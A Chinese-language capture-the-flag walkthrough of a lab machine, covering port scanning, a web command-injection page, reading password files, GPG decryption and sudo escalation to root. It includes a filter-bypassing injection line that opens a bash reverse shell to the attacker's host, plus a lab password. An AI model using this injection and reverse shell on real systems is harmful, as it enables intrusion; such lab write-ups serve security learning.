1.信息收集
使用arp-scan-l确定目标靶机
使用nmap确定靶机开放的端口
发现靶机开放了:21、80.25468 端口
可以看到目标靶机将ssh远程连接端口改为了25468端口
浏览器访问目标靶机80端口
发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了
查看源代码也没有发现什么,继续访问login.html页面,页面显示禁止外部登录
扫描一下网站的开放目录
发现有一个robots.txt的文件
分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行
执行一下ls命令看看,发现执行不成功,不成功的原因可能是自动过滤掉了
当我们执行whoami后发现可以成功
在这里我们就可以反弹一下shell
pwd&echo "bash -i >& /dev/tcp/192.168.183.129/4444 0>&1" | bash
权限提升
查看用户的sudo权限
发现没有可以提权的东西,查看用户的suid权限
也没有能够进行提权的命令
进入家目录,发现有四个用户
先看bob的家目录里面有什么
发现有一个.old_passwordfile.html文件,查看其内容
发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么
jc的家目录:
seb的家目录:
elloit的家目录:
这里是发现了一个theadminisdumb.txt文件,查看其内容
信中的内容提到了bob,所以再次进入bob的家目录看一下
在Documents这个路径下发现了三个文件,
查看一下staff.txt文件的内容
说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥
还有一个Secret的文件夹,随着这个文件往下面找
在这个路径下面发现有一个可执行文件,查看其内容
网上查资料发现这个密钥就是藏头诗,所以密钥就为HARPOCRATES
然后回到那个gpg文件所在的目录,进行解密
还是不行,好像是因为权限的问题,所以先切换到jc用户 密码Qwerty
再次进行解密
成功获得bob用户的密码,切换为bob用户
可以看到是具有所有命令的,所以直接使用sudo -i命令切换为root用户
在根目录下成功获得flag
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看
完成。